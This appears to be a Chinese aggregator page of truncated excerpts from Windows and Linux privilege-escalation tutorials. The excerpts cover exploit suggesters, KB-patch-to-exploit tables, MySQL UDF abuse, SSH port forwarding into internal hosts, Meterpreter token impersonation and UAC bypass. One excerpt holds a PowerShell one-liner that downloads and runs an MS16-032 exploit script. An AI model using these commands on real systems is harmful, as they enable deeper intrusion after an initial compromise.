windows下提权基础】的更多相关文章

拿到webshell很多时候代表渗透的开始,下面带来windows提权基础 环境:虚拟机 win7系统 首先:查看权限whoami 我们知道windows的高权限应该是administrator和system权限. 不管了,我直接创建用户 先提权限,基本步骤: systeminfo>1.txt github下载Windows-Exploit-Suggester-master/然后update 执行命令: ./windows-exploit-suggester.py -d 2019-04-11-m…
#include <windows.h> bool AdjustPrivileges() { HANDLE hToken = NULL; TOKEN_PRIVILEGES tp; TOKEN_PRIVILEGES oldtp; DWORD dwSize = sizeof(TOKEN_PRIVILEGES); LUID luid; OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken); if (!LookupPr…
有些新手朋友在拿到一个webshell后如果看到服务器是Linux或Unix操作系统的就直接放弃提权,认为Linux或Unix下的提权很难,不是大家能做的,其实Linux下的提权并没有很多人想象的那么难,你真去尝试做了,也许你就会发现Linux下的提权并不难,尤其是一些简单的提权方法是很容易学会的.Linux下的提权我知道的比较简单的方法都是在命令行下完成的,很多新手叉子可能根本没接触过Linux下的一些常用命令,今天危险漫步就给大家介绍一些Linux下提权过程中常用到的Linux命令,由于我也…
windows内核提权漏洞 环境: Kali Linux(攻击机) 192.168.190.141 Windows2003SP2(靶机) 192.168.190.147 0x01寻找可利用的exp 实战中我们在拿到一个反弹shell后(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester.这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权. 如下图,有一个普通用…
一.目的 本文的目的是windows下IOS开发基础环境搭建做了对应的介绍,大家可根据文档步骤进行mac环境部署: 二.安装虚拟机 下载虚拟机安装文件绿色版,点击如下文件安装 获取安装包:          百度网盘:链接:http://pan.baidu.com/s/1c28EkpE 密码:93tl 解压后如下,点击如下脚本进行安装:按提示进行: 服务配置(按需配置): 这里仅限配置网络功能即可:选择1 回车-选择桥接模式 选择2启用桥接服务 三.安装macos虚拟机 注意:查看本机cup类型…
一.ssh远程端口转发 背景:当我们在渗透过程中,获取到内网的一台仅有内网IP的服务器后,我们可以通过ssh隧道,将内网某个主机的端口进行远程转发 1.网络拓扑图 假设获取的服务器为web服务器,web服务器将远程内网目标服务器的3389端口,通过ssh远程端口转发给VPS的3307端口,然后在VPS上访问自己本地地址和3307,即可远程到内网的主机 2.实验环境 VPS:192.168.4.134 web服务器:1.1.1.11 数据库服务器:1.1.1.12 3.实验步骤 在web服务器上执…
这是[信安成长计划]的第 22 篇文章 0x00 目录 0x01 介绍 0x02 替换 Token 0x03 编辑 ACL 0x04 修改 Privileges 0x05 参考文章 继续纠正网上文章中那些奇怪的情况和问题 0x01 介绍 虽然主题是 Windows 内核提权,但实际上还是对之前文章的一个总结,这篇文章中所用到的东西全都是前几篇文章所提到的知识点,所有的操作都是之前文章中所讲述过的,以下所有的实验都是在 Win10_x64_20H2 上进行的. 0x02 替换 Token 主要原理…
1.这是一个啥漏洞? 睁眼一看,妈呀本地提权,快加入本地提权漏洞利用包里,速度加入.github连接我就不发了.担心被认为是传播黑客工具,咱们在这里单纯学习一下漏洞的原理和部分源代码. 2.文件读写权限转命令执行权限! 为啥能提权,基本原理先说一下,这个漏洞可以让你拥有"文件读写权限转命令执行权限"的典型案例,利用一个低权限获取高权限文件的读写权限,即可利用恶意代码注入,劫持dll等方式赋予自己高权限或者劫持高权限,从而获得命令执行的权限.举个例子:有一个system的py脚本会定期运…
目录 提权利用的漏洞 PR提权 提权利用的漏洞 Microsoft Windows RPCSS服务隔离本地权限提升漏洞 RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程,本地攻击者可以利用令牌劫持的方式获得权限提升.成功利用此漏洞的攻击者可以完全控制受影响的系统,攻击者可随后安装程序:查看.更改或删除数据:或者创建拥有完全用户权限的新帐户. BUGTRAQ  ID: 34443  CVE(CAN) ID: CVE-2009-0079 发布…
英文原文: Basic Linux Privilege Escalation 在开始之前,我想指出 - 我不是专家. 据我所知,在这个巨大的领域没有一个“魔法”的答案. 这只是我的发现,写出来,共享而已(是我的起点). 下面列举的项中会出现几个不同命令,都是做同样的事,在不同的场景使用可能会有不一样的亮点.我知道有更多的东西有待探索, 这只是一个基本和粗略的指导. 并不是每个命令都适用于每个系统,因为Linux版本之间有很大的不同. "It" will not jump off the…
英文原文: Basic Linux Privilege Escalation 在开始之前,我想指出 - 我不是专家. 据我所知,在这个巨大的领域没有一个“魔法”的答案. 这只是我的发现,写出来,共享而已(是我的起点). 下面列举的项中会出现几个不同命令,都是做同样的事,在不同的场景使用可能会有不一样的亮点.我知道有更多的东西有待探索, 这只是一个基本和粗略的指导. 并不是每个命令都适用于每个系统,因为Linux版本之间有很大的不同. "It" will not jump off the…
pr.巴西烤肉 对应补丁 好多朋友见到Windows服务器就祭出pr.巴西烤肉一气搞,忙完免杀又忙找可写目录,最后发现服务器打上了对应的补丁.笔者在提权前都会执行systeminfo命令,查看对应补丁有没打上. PR对应补丁号:          KB952004 巴西烤肉对应补丁号:KB956572…
windows主机 用户有三种:Users,Administrator,System 本地拥有administrator权限用户提权到system用户 win2003: at命令 系统调度任务的指令,会调用system指令完成任务指定一个时间,操作系统自动执行一个命令 at : /interactive cmd #:13分执行一个交互式的cmd win7-8 sc命令创建一个系统服务创建了一个系统服务:重新启动一个命令行窗口,服务类型-交互性创建的系统服务的名称就是syscmd(随便起)服务默认…
1.总结关于udf提权方法 通过弱口令,爆破,网站配置文件等方式得到mysql数据库帐号密码,---还要能外连 (1).将udf.dll代码的16进制数声明给my_udf_a变量 set @my_udf_a=concat('',dll的16进制); (2).建表my_udf_data,字段为data,类型为longblob. udf.dll https://pan.baidu.com/s/1FY8Ej1tMDGdbb5OEcx3BgA create table my_udf_data(data…
--------------------------------------------------------------------------------- 声明:本文仅做学习,实验主机为虚拟机,请勿用于非法用途 --------------------------------------------------------------------------------- 影响版本: windows_10:- windows_10: windows_10: windows_10: win…
令牌(token)相当于系统的临时密钥(账号及密码) 加载incognito模块 meterpreter> use incognito meterpreter > list_tokens -u    //列出可用令牌 meterpreter > impersonate_token WIN-xxxxxxxxx\\Administrator   //模拟令牌 [+] Successfully impersonated user WIN-xxxxxx\Administrator  //成功模拟…
试用系统:Tested on x32 Win7, x64 Win8, x64 2k12R2 提权powershell脚本: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercont…
Not many people talk about serious Windows privilege escalation which is a shame. I think the reasons for this are probably (1) during pentesting engagements a low-priv shell is often all the proof you need for the customer, (2) in staged environment…
环境准备: pywin32的安装在第八章的键盘记录中有,这里还需要安装wmi: 在本人的32位win7上本来是没有easy_install这个命令的,这需要安装setuptools-0.6c11.win32-py2.7.exe即可 http://www.sobaidupan.com/file-3739339.html 接着下载安装bhpservice.zip:https://www.nostarch.com/download/bhpservice.zip 安装步骤按下载下来的文档来进行即可,安装…
原文链接:http://blog.csdn.net/woshioosm/article/details/45560177 1, 解压zookeeper ,在目录下建立文件夹 data 和log 2,在conf文件夹下 修改zoo_sample.cfg 改名为  zoo.cfg 添加 # 存储内存中数据库快照的位置,如果不设置参数,更新事务日志将被存储到默认位置. dataDir=D:\\zookeeper-3.4.6\\data # 错误日志的存放位置 dataLogDir=D:\\zookee…
项目地址:https://github.com/SandboxEscaper/randomrepo 相关工具的下载地址: Process Explorer:https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer CFF Explorer:https://ntcore.com/?page_id=388 复现: 打开一个记事本和 Process Explorer 记事本的 pid 号为 1944 接下来利用漏洞…
漏洞简述 该漏洞位于Windows的UAC(User Account Control,用户账户控制)机制中.默认情况下,Windows会在一个单独的桌面上显示所有的UAC提示——Secure Desktop.这些提示是由名为consent.exe的可执行文件产生的,该可执行文件以NT AUTHORITY\SYSTEM权限运行,完整性级别为System.因为用户可以与该UI交互,因此对UI来说紧限制是必须的.否则,低权限的用户可能可以通过UI操作的循环路由以SYSTEM权限执行操作.即使隔离状态的…
2003     systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB259…
Windows by default are vulnerable to several vulnerabilities that could allow an attacker to execute malicious code in order to abuse a system. From the other side patching systems sufficiently is one of the main problems in security. Even if an orga…
1.数据库表操作: - 首先启动mysql服务器,在安装mysql的目录下打开cmd窗口,运行mysql:'mysql.exe -hlocalhost -p3306 -uroot -p123456'; - 查看所有的数据库: show databases;  -- create database my_database; - use my_database; --> show tables; --> create table class(name varchar(10), room varch…
1.  查看系统打补丁情况:systeminfo 2.  查看KB-EXP表: KB2360937 MS10-084 KB2478960 MS11-014 KB2507938 MS11-056 KB2566454 MS11-062 KB2646524 MS12-003 KB2645640 MS12-009 KB2641653 MS12-018 KB952004 MS09-012 Pr.exe KB956572 MS09-012 巴西烤肉 KB971657 MS09-041 KB2620712 M…
inline BOOL SetPrivilege() { HANDLE hProcess, hToken; TOKEN_PRIVILEGES NewState; LUID luidPrivilegeLUID; hProcess = GetCurrentProcess(); if(!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES, &hToken)) return FALSE; if (!LookupPrivilegeValue(NULL, S…
msf本地提权 目录 1. 利用uac提权 1 2. 绕过uac认证 2 3. 利用windows本地提权漏洞进行提权 4 1. 利用uac提权 前提与目标机建立会话连接 seach local/ask     搜索关键字local/ask use 0      进入到exploit/windows/local/ask模块下 show options 查看相关参数 set FILENAME qqUPdate.exe 设置文件名qqUPdate.exe(具有迷惑性的名字都可以) set sessi…
摸鱼的时候,想想内网这部分还有什么地方适合水一下,翻翻往期,开始填坑 总结一下Windows提权的部分,以后有时间再补一下Linux提权 这仍然是一篇思路总结类的随笔,具体细节内容不展开,也展开不了......欢迎去各大社区学习大佬们的操作 关于第三方提权以后再说 0x00前言 常见的Windows权限有三种:user administrator system (当然还有其他的) administrator管理员权限是比较高的,但是如果涉及到读取系统文件,还是要靠system权限 和web提权一…
之前写过了windows提权小结,这下一篇水什么就有了嘛,于是有了这篇水文,整理一下Linux提权 前篇windows提权小结 ,链接送上 https://www.cnblogs.com/lcxblogs/p/14163338.html  0x00 前言 同windows提权的目的,也是从普通用户权限提升到管理员权限,以便实现读写敏感文件.横向移动进一步控制.执行一些需要权限的命令之类的要求 仍然是思路总结性质的文章,具体操作不展开介绍 具体如何做,应该注意哪些细节,请参考网上其他师傅们的复现操…